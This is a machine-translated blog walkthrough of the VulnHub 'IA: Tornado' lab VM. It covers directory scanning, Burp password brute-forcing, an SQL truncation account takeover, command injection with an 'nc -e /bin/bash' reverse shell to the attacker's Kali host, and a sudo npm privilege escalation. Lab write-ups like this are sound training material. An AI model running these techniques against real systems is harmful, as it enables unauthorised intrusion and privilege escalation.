当前位置:网站首页>Penetration practice vulnhub range Tornado

Penetration practice vulnhub range Tornado

2022-07-01 17:39:00 It's safe to go to school on Fubo road

No.27 Tornado

Target information

Download address :

https://www.vulnhub.com/entry/ia-tornado,639/

shooting range : VulnHub.com

Target name : IA: Tornado

difficulty : secondary

Release time : 2020 year 12 month 20 Japan

Prompt information :

 nothing

The goal is : user.txt and root.txt

Experimental environment 

 attack :VMware	kali	192.168.7.3

 Drone aircraft :Vbox		linux	IP Automatic access to

information gathering

Scan host

Scan the target in the LAN IP Address 

sudo nmap -sP 192.168.7.1/24

image-20220210213917794

The scanned host address is 192.168.7.164

Scan port

Scan the open service port of the target 

sudo nmap -sC -sV -p- 192.168.7.164 -oN Tornado.nmap

image-20220210214040170

Scan to 2 Open ports ,22(SSH) and 80(HTTP) service , First from 80 Start

Web penetration

visit 80 port 

http://192.168.7.164

image-20220210214215833

Open it up and it's apache2 The default page for , Do a directory scan

Directory scanning 

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.7.164 -x php,html,txt,zip

image-20220210214627311

Scan to a directory , Open it and see. 

http://192.168.7.164/bluesky

image-20220210214738220

After opening, there is a normal page , Sensitive information not found , Yes bluesky Scan the directory again 

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.7.164/bluesky -x php,html,txt,zip

image-20220210215349342

Scan to multiple suspicious pages ,contact.php、prot.php There is also a registration page signup.php, Let's register an account first 

http://192.168.7.164/bluesky/signup.php

image-20220210215522912

Register an account [email protected] password 123123, Go to login 

http://192.168.7.164/bluesky/login.php

image-20220210215654391

visit contact.php page 

http://192.168.7.164/bluesky/contact.php

image-20220210215818360

Prompt comment function is turned off , I want to see others port.php page 

http://192.168.7.164/bluesky/port.php

image-20220210215930917

Tips “LFI( The local file contains ) The vulnerability has been fixed , Don't forget to test again ”, It should be that our test file contains vulnerabilities , Open the source file and find some hints

image-20220210220136297

stay 165 OK gave us a file address /home/tornado/imp.txt

First make a fuzzy test , Detect the parameters contained in the file .

I did all the pages FUZZ The fuzzy test failed , So far, I can't go on , So I cracked the server root Login to the host with password to view

stay /etc/apache2/apache2.conf Found in file Alias /~tornado/ “/home/tornado/”

image-20220211043308603

This is indeed a LFI Loophole , But not on any page , This vulnerability is caused by the configuration alias of the server , Please also let us know how to find this vulnerability

image-20220211003020367

download imp.txt file 

wget http://192.168.7.164/~tornado/imp.txt
cat imp.txt

image-20220211004019445

Get some user names , But you can't log in without a password web, Try bursting

I found that the email number was incomplete during the manual test , After checking the source code, I found that the length of the input box is limited

image-20220211004348733

Manual handle 13 Just make it bigger , After modification, you can enter the account number completely

image-20220211010159034

But why limit 13, I checked , Here you are 3 Account number is 13 Bit , Is this 3 One is the correct account

image-20220211010324547

Then the passwords of these three accounts were broken

Web Password burst

Set the attack type to cluster bomb (Clusterbomb), And will uname and upass Set to payload Variable

image-20220211010526410

payload1 Set to 3 User name

image-20220211010723552

payload2 I use the /usr/share/wordlists/rockyou.txt Dictionaries

image-20220211011421779

Success breaks out [email protected] User's password ( There are many passwords , Everyone can log in )

image-20220211011856901

It's useless after login , As with manually registered users, there are no more prompts

image-20220211012056680

[email protected] Accounts can reveal so many passwords , Why don't the other two have any results

When I can't find any way forward , Registered on the registration page [email protected] Account number

image-20220211012553996

Use it with joy [email protected] The user logs in again

image-20220211014151665

and [email protected] Results the same , Now there is another user [email protected], How to get login [email protected] What about the account number ?[email protected] Why does the account have multiple passwords

SQL Truncation Attack(SQL Truncation attack )

​ Because the location of the user name is limited, Lenovo has also made restrictions on the background database, plus [email protected] Users' multiple passwords must be associated with multiple passwords in the background [email protected] user , The sum of the two conditions can be guessed to be SQL Multiple after truncation attack [email protected] user

brief introduction :

​ When the database truncates user input due to length constraints , It will happen SQL Block vulnerability . Attackers can collect key fields ( Like username ) Length information , And use this information to obtain unauthorized access .

Let's test it , To register an account, first modify the input restrictions , Fill in the user name is [email protected] Space a,

image-20220211015321464

image-20220211015340646

Registered successfully , Now use [email protected] User and password login when registering user

image-20220211021200203

image-20220211021226357

Login successfully and in contact.phpd See a new function under the page , Input id The command returned id, But if there is no return result, it may not be echoed

image-20220211022936927

Try a rebound shell OK?

rebound shell

kali Attacker listening port 4444

nc -lvvp 4444

image-20220211023239339

Submit a rebound on the target payload

nc -e /bin/bash 192.168.7.3 4444

image-20220211023251985

image-20220211023315875

Rebound success , Switch interactive shell Look for sensitive information 

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm

image-20220211023511883

ls
cat signup.php

image-20220211023655794

image-20220211023713261

Database account number root password heheroot, Switch root Users try

image-20220211023803580

Switch root User failed , Sign in mysql look down [email protected] What's the status of the account

image-20220211031654593

Sure enough, there are many same accounts , Check where you can Raise the right 

sudo -l

image-20220211023914158

Find something you can use catchme User identity execution npm

npm Raise the right

Two files need to be prepared ,package.json and shell.sh

package.json The contents of the document , This file can be written on the attacker first , Then open http service , Then download the file with the target . It can also be created directly on the target , But the echo is not very good .

{
    
  "name": "shell",
  "version": "1.0.0",
  "description": "",
  "main": "index.js",
  "scripts": {
    
    "shell": "./shell.sh"
  },
  "author": "",
  "license": "ISC"

}

shell.sh

echo "/bin/bash" >shell.sh

by shell.sh Plus executable rights 

chmod +x shell.sh

perform payload

sudo -u catchme npm run shell

image-20220211032712156

Mention right to success , Enter the user directory and find user.txt

cd /home/catchme
ls -all
cat user.txt

image-20220211032901082

catchme There is a enc.py file , Check out the content 

cat enc.py

image-20220211034347272

There is an encrypted string , This is the content encrypted by Caesar , We go through python Script to decrypt

decode.py

import string
alphabet = string.ascii_lowercase
encrypted = "hcjqnnsotrrwnqc"
enc_len = len(encrypted)
for i in range(40):
    plain_text = ""
    for c in encrypted:
        if c.islower():
            c_unicode = ord(c)
            c_index = ord(c) - ord("a")
            new_index = (c_index - i) % 26
            new_unicode = new_index + ord("a")
            new_character = chr(new_unicode)
            plain_text = plain_text + new_character
        else:
            plain_text += c
    print(f"ID:{i} : {plain_text}")

python3 decode.py

Get the decrypted content , Here you are 0-39 common 40 Group password where ID:25(idkrootpussxord) Readability is more like a password , Use it to switch root Users try 

ID:0 : hcjqnnsotrrwnqc
ID:1 : gbipmmrnsqqvmpb
ID:2 : fahollqmrppuloa
ID:3 : ezgnkkplqootknz
ID:4 : dyfmjjokpnnsjmy
ID:5 : cxeliinjommrilx
ID:6 : bwdkhhminllqhkw
ID:7 : avcjgglhmkkpgjv
ID:8 : zubiffkgljjofiu
ID:9 : ytaheejfkiineht
ID:10 : xszgddiejhhmdgs
ID:11 : wryfcchdigglcfr
ID:12 : vqxebbgchffkbeq
ID:13 : upwdaafbgeejadp
ID:14 : tovczzeafddizco
ID:15 : snubyydzecchybn
ID:16 : rmtaxxcydbbgxam
ID:17 : qlszwwbxcaafwzl
ID:18 : pkryvvawbzzevyk
ID:19 : ojqxuuzvayyduxj
ID:20 : nipwttyuzxxctwi
ID:21 : mhovssxtywwbsvh
ID:22 : lgnurrwsxvvarug
ID:23 : kfmtqqvrwuuzqtf
ID:24 : jelsppuqvttypse
ID:25 : idkrootpussxord
ID:26 : hcjqnnsotrrwnqc
ID:27 : gbipmmrnsqqvmpb
ID:28 : fahollqmrppuloa
ID:29 : ezgnkkplqootknz
ID:30 : dyfmjjokpnnsjmy
ID:31 : cxeliinjommrilx
ID:32 : bwdkhhminllqhkw
ID:33 : avcjgglhmkkpgjv
ID:34 : zubiffkgljjofiu
ID:35 : ytaheejfkiineht
ID:36 : xszgddiejhhmdgs
ID:37 : wryfcchdigglcfr
ID:38 : vqxebbgchffkbeq
ID:39 : upwdaafbgeejadp

Switch root user 

su root
 Input password idkrootpussxord

image-20220211042511312

Login failed , Look closely at this string, which consists of three parts 

idk
root
pussxord

Take this pussxord Replace with password Switch successful 

idkrootpassword

image-20220211042720369

see root.txt

cd /root
ls
cat root.txt

image-20220211042802346

Get root.txt Game over . Friends who like shooting can search on wechat “ It's safe to go to school on vobo road ” official account 、 Or scan the QR code below to get more targeting articles .
Insert picture description here

原网站

版权声明
本文为[It's safe to go to school on Fubo road]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/02/202202152327514084.html

边栏推荐

猜你喜欢

随机推荐